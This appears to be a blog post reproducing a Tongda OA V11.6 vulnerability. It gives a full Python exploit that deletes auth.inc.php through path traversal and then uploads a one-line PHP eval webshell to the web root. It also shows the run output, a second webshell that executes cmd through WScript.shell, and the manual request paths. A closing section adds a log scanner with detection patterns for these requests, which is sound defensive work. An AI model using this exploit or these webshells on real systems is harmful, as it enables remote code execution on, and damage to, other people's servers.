Environment setup

Tongda OA V11.6 download address: http://www.kxdw.com/soft/23114.html

After downloading, simply run the installer.


Log in with the default account admin and an empty password.


Note: this vulnerability is not harmless. Successful exploitation deletes a PHP file from the application, which breaks its functionality.

Vulnerability reproduction

Here the exp is used directly; on success it writes a one-line webshell _oatest.php with password t into the web root.

import requests
import sys

payload = "<?php eval($_POST['t']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
target = input("Please enter URL: ")
input("Press enter to continue!")
# Step 1: file deletion through the guid parameter of print.php
print("[*]Deleting auth.inc.php....")
url = target + "/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
# Step 2: confirm the file is gone (php-cgi answers "No input file specified." for a missing script)
print("[*]Checking if file deleted...")
url = target + "/inc/auth.inc.php"
page = requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to delete auth.inc.php")
    sys.exit(-1)
print("[+]Successfully deleted auth.inc.php!")
# Step 3: upload via upload.php; the repkid value places the file in the web root as _<filename>
print("[*]Uploading payload...")
url = target + "/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('oatest.php', payload)}
requests.post(url=url, files=files)
# Step 4: check whether the uploaded file is reachable
url = target + "/_oatest.php"
page = requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]File Uploaded Successfully")
    print("[+]URL:", url)
else:
    print("[-]Failed to upload file")

After running it, enter the URL and press Enter to confirm. Once again: this vulnerability is not harmless!

>exp.py
[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA
Please enter URL: http://192.168.0.110:8080/
Press enter to continue!
[*]Deleting auth.inc.php....
[*]Checking if file deleted...
[+]Successfully deleted auth.inc.php!
[*]Uploading payload...
[+]Filed Uploaded Successfully
[+]URL: http://192.168.0.110:8080//_oatest.php


On the target machine, the file can be seen to have been written successfully.


Some functions are disabled by default, which prevents command execution, so a different method is used here.


<?php
$command=$_GET['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

Run whoami


Logging in again, the page is now visibly broken.

To restore it, simply move auth.inc.php back into the webroot/inc/ directory.

If doing it manually,

/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php

triggers the file deletion and removes auth.inc.php. As for why that file is deleted: anyone who looks at the filename, or at the exp above, will probably already understand; it mainly paves the way for the upload.

general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./

Upload the file with a form POST.

Then check whether it succeeded:

/_[filename]

Example: http://192.168.0.110:8080/_oatest.php

For anyone who did not understand [filename]: it is simply whatever filename you uploaded.
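As an added defender-side example that is not part of the original post: a small Python scanner that looks for the two request patterns above (the print.php guid traversal and the upload.php repkid traversal), together with the exp's own follow-up requests, in web server access logs. The combined log format, the sample lines and the label names are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not taken from a real server.
SAMPLE_LOG = """\
192.168.0.5 - - [19/Aug/2020:12:01:03 +0800] "GET /module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php HTTP/1.1" 200 0
192.168.0.5 - - [19/Aug/2020:12:01:04 +0800] "GET /inc/auth.inc.php HTTP/1.1" 200 24
192.168.0.5 - - [19/Aug/2020:12:01:05 +0800] "POST /general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./ HTTP/1.1" 200 15
192.168.0.7 - - [19/Aug/2020:12:02:00 +0800] "GET /general/index.php HTTP/1.1" 200 5120
192.168.0.5 - - [19/Aug/2020:12:01:06 +0800] "GET /_oatest.php HTTP/1.1" 200 10
"""

# client, timestamp, method, path and status code from one combined-format line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def classify_request(method, raw_path):
    """Return a finding label for one request, or None when nothing matches."""
    path = unquote(raw_path)  # the traversal markers may arrive percent-encoded
    lowered = path.lower()
    if "/module/appbuilder/assets/print.php" in lowered and ".." in path:
        return "file-deletion: print.php guid escapes its directory"
    if ("/data_center/utils/upload.php" in lowered and "repkid=" in lowered
            and (".<>." in path or ".." in path)):
        return "traversal-upload: upload.php repkid escapes the attachment directory"
    if lowered.split("?")[0] == "/inc/auth.inc.php":
        # auth.inc.php is only ever included server-side; a direct request is a probe
        return "probe: direct request for inc/auth.inc.php"
    if method == "GET" and re.match(r"^/_[^/?]+\.php(\?|$)", lowered):
        return "webroot-file: request for an underscore-prefixed php file in the web root"
    return None


def scan_log(text):
    """Return (client, timestamp, label, path) for every suspicious request in text."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, ts, method, path, _status = m.groups()
        label = classify_request(method, path)
        if label:
            findings.append((client, ts, label, path))
    return findings


if __name__ == "__main__":
    for client, ts, label, path in scan_log(SAMPLE_LOG):
        print(f"{ts} {client} {label} {path}")
```

Seeing the deletion request followed by a direct request for inc/auth.inc.php and then the upload from one client within seconds is the sequence the exp above produces.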

Last modification: August 19th, 2020 at 12:56 pm